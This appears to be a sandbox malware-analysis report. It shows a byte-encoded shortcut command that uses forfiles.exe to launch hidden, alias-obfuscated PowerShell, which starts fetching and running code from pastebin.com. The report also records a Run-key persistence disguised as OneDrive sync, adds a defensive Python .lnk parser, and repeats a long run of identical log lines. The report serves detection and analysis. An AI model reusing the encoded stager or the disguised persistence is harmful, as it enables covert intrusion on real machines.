105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,0,0,0,85,0,0,0,24,0,0,0,3,0,0,0,96,56,18,250,16,0,0,0,87,105,110,100,111,119,115,0,67,58,92,87,105,110,100,111,119,115,92,83,121,115,116,101,109,51,50,92,102,111,114,102,105,108,101,115,46,101,120,101,0,0,38,0,46,0,46,0,92,0,46,0,46,0,92,0,46,0,46,0,92,0,87,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,83,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,
92,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,215,0,47,0,112,0,32,0,99,0,58,0,92,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,92,0,115,0,121,0,115,0,116,0,101,0,109,0,51,0,50,0,32,0,47,0,109,0,32,0,110,0,111,0,116,0,101,0,112,0,97,0,100,0,46,0,101,0,120,0,101,0,32,0,47,0,99,0,32,0,34,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,46,0,101,0,120,0,101,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,112,0,111,0,119,0,101,0,114,0,115,0,104,0,101,0,108,0,108,0,32,0,45,0,119,0,105,0,110,0,100,0,111,0,119,0,115,0,116,0,121,0,108,0,101,0,32,0,104,0,32,0,45,0,99,0,111,0,109,0,109,0,97,0,110,0,100,0,32,0,39,0,115,0,97,0,108,0,32,0,102,0,97,0,116,0,98,0,97,0,107,0,101,0,32,0,99,0,97,0,108,0,99,0,59,0,115,0,97,0,108,0,32,0,99,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,0,97,0,115,0,116,0,101,0,98,0,105,0,110,0,46,0,99,0,111,0,109,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync (2 identical events)
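The AMSI buffer above is the persistence stage: the script creates C:\ProgramData\Microsoft OneDrive\FileSync, registers the Run value OneDrive File Sync pointing at BeginSync.lnk there, and rebuilds that shortcut from the $savedbytes array, whose first bytes (76,0,0,0 followed by the shell-link CLSID) are a ShellLinkHeader with ShowCommand 7. The Python below is an added example, not code from the report or from the sample: it parses the ShellLinkHeader and the StringData strings of a .lnk following the public MS-SHLLINK layout, feeds it the 76 header bytes from the array exactly as printed (the array itself is truncated on the page, so the parser reports truncation instead of failing), and checks a constructed minimal shortcut built from the target and arguments the report shows. The builder and the triage heuristics are the example's own assumptions.

```python
"""Parse the ShellLinkHeader and StringData of a Windows .lnk (MS-SHLLINK).

Added example, not part of the sandbox report or of the sample. The parser
tolerates short input because the $savedbytes array is truncated on the page.
"""
import struct
from datetime import datetime, timedelta

LNK_CLSID = bytes([1, 20, 2, 0, 0, 0, 0, 0, 192, 0, 0, 0, 0, 0, 0, 70])  # {00021401-0000-0000-C000-000000000046}

# LinkFlags names, bit 0 first (MS-SHLLINK section 2.1.1).
LINK_FLAGS = [
    "HasLinkTargetIDList", "HasLinkInfo", "HasName", "HasRelativePath",
    "HasWorkingDir", "HasArguments", "HasIconLocation", "IsUnicode",
    "ForceNoLinkInfo", "HasExpString", "RunInSeparateProcess", "Unused1",
    "HasDarwinID", "RunAsUser", "HasExpIcon", "NoPidlAlias", "Unused2",
    "RunWithShimLayer", "ForceNoLinkTrack", "EnableTargetMetadata",
    "DisableLinkPathTracking", "DisableKnownFolderTracking",
    "DisableKnownFolderAlias", "AllowLinkToLink", "UnaliasOnSave",
    "PreferEnvironmentPath", "KeepLocalIDListForUNCTarget",
]
# StringData sections in file order, each gated by one LinkFlags bit.
STRING_DATA = [(2, "name"), (3, "relative_path"), (4, "working_dir"),
               (5, "arguments"), (6, "icon_location")]
SHOW_COMMANDS = {1: "SW_SHOWNORMAL", 3: "SW_SHOWMAXIMIZED", 7: "SW_SHOWMINNOACTIVE"}

# The first 76 bytes of $savedbytes exactly as the AMSI buffer prints them.
SAVEDBYTES_HEADER = bytes([
    76, 0, 0, 0, 1, 20, 2, 0, 0, 0, 0, 0, 192, 0, 0, 0, 0, 0, 0, 70,
    171, 0, 8, 0, 32, 0, 0, 0,
    124, 37, 104, 27, 210, 97, 216, 1, 203, 131, 156, 28, 20, 3, 219, 1,
    124, 37, 104, 27, 210, 97, 216, 1, 0, 16, 1, 0, 0, 0, 0, 0, 7, 0, 0, 0,
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
])


def filetime_to_datetime(ft):
    """FILETIME is 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1) + timedelta(microseconds=ft // 10)


def parse_lnk(data):
    """Return the header fields plus every StringData string that is complete."""
    if len(data) < 76 or data[:4] != b"L\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad HeaderSize or LinkCLSID")
    flags, attrs, ctime, _atime, wtime, size, _icon, show = struct.unpack_from("<IIQQQIII", data, 20)
    info = {
        "flags": [name for bit, name in enumerate(LINK_FLAGS) if flags >> bit & 1],
        "file_attributes": attrs,
        "file_size": size,
        "creation_time": filetime_to_datetime(ctime),
        "write_time": filetime_to_datetime(wtime),
        "show_command": SHOW_COMMANDS.get(show, show),
        "truncated": False,
    }
    pos = 76
    try:
        if flags & 0x01:  # LinkTargetIDList: u16 IDListSize, then the item IDs
            pos += 2 + struct.unpack_from("<H", data, pos)[0]
        if flags & 0x02:  # LinkInfo: u32 LinkInfoSize covers the whole structure
            pos += struct.unpack_from("<I", data, pos)[0]
        width = 2 if flags & 0x80 else 1  # IsUnicode: UTF-16LE, else system code page
        for bit, key in STRING_DATA:
            if not flags >> bit & 1:
                continue
            count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
            raw = data[pos + 2:pos + 2 + count * width]
            if len(raw) < count * width:
                raise struct.error("StringData runs past the end of the buffer")
            info[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
            pos += 2 + count * width
    except struct.error:
        info["truncated"] = True  # the buffer ended before the structure did
    return info


def build_lnk(relative_path, arguments, show_command=7):
    """Constructed test input: a minimal Unicode .lnk with no IDList and no LinkInfo."""
    flags = 0x08 | 0x20 | 0x80  # HasRelativePath | HasArguments | IsUnicode
    header = struct.pack("<I16sIIQQQIIIHHII", 76, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments))
    return header + body


def indicators(info):
    """Triage heuristics (the example's own) that match the shortcut in this report."""
    target = info.get("relative_path", "").lower()
    args = info.get("arguments", "").lower()
    hits = []
    if target.endswith("\\forfiles.exe") and "/c" in args:
        hits.append("forfiles.exe used as a proxy launcher (/c)")
    if "powershell" in args:
        hits.append("shortcut arguments spawn PowerShell")
    if info["show_command"] == "SW_SHOWMINNOACTIVE":
        hits.append("target window opens minimized and unfocused")
    return hits


if __name__ == "__main__":
    print(parse_lnk(SAVEDBYTES_HEADER))
```

Two things the header alone already tells a responder: the LinkFlags include HasArguments (the shortcut carries a command line, which a plain link to forfiles.exe would not need) and ShowCommand is SW_SHOWMINNOACTIVE, so the launched window is minimized and never takes focus. Run values that point at a .lnk under C:\ProgramData rather than at an executable are rare enough to alert on by themselves.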

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: NULL (2 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (93 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
